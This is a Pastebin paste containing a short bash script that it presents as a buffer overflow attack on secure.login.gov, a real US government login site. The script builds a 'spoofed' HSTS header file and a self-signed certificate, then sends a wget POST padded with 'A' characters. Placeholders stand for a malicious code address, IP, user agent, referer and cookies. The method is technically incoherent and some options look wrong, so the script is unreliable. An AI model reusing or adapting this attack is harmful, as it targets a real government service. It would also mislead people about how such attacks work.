Advertisement
WhosYourDaddySec

Just Playing Around With Johnny Law

Feb 6th, 2024
154
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 1.32 KB | None | 0 0
  1. bash
  2. # Step 1: Create HSTS policy spoof
  3. echo "Strict-Transport-Security: max-age=31536000" >> spoofed_headers.txt
  4.  
  5. # Step 2: Create self-signed PEM certificate
  6. openssl req -new -newkey rsa:2048 -days 365 -nodes -x509 -keyout server.key -out server.crt
  7.  
  8. # Step 3: Run buffer overflow attack
  9. wget --post-data='data=A'$(printf %492s | tr ' ' A)'<malicious code address>' --header='Content-Type: application/x-www-form-urlencoded' --header='Content-Length: 500' --header='X-Forwarded-For: <malicious IP address>' --header='User-Agent: <malicious user agent string>' --header='Referer: <malicious referer URL>' --header='Cookie: <malicious cookies>' --no-check-certificate --certificate=server.crt --private-key=server.key --header-file=spoofed_headers.txt https://secure.login.gov/path
  10.  
  11.  
  12. # This script first creates a spoofed HSTS policy by echoing the "Strict-Transport-Security: max-age=31536000" header into a file called spoofed_headers.txt. Then it creates a self-signed PEM certificate using openssl. Finally, it runs the buffer overflow attack using wget with the spoofed headers, self-signed certificate, and malicious payload. Note that the <malicious code address>, <malicious IP address>, <malicious user agent string>, <malicious referer URL>, and <malicious cookies> should be replaced with the actual values of the attacker's choosing.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement